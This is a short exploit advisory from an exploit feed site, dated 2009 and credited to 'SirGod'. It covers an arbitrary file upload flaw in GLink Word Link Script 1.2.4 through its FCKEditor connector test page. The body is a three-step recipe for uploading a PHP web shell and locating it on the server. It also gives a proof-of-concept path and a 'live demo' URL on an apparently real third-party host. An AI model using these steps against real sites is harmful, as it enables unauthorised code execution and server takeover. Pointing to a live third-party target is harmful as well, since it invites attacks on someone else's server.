GLink Word Link Script 1.2.4 (FCKEditor) Arbitrary File Upload

Home » Exploits » GLink Word Link Script 1.2.4 (FCKEditor) Arbitrary File Upload

Feeds - Exploits

Written by SirGod

Saturday, 04 April 2009 21:49

#########################################################

[+] GLink Word Link Script 1.2.4 (FCKEditor) Arbitrary File
    Upload
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
#########################################################
[+] Arbitrary File Upload
 1)Go to :
   http://[target]/[path]/FCKEditor/editor/filemanager/browser/
default/connectors/test.html

 2)Choose your file.Select PHP as Connector.Hit upload.

 3)You will find your file here :
   http://[target]/[path]/UserFiles/File/your_shell.php

 PoC:
  http://127.0.0.1/FCKeditor/editor/filemanager/browser/default/
connectors/test.html

 Live Demo :
   http://dev.tufat.com/glink/FCKeditor/editor/filemanager/
browser/default/connectors/test.html
#########################################################

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff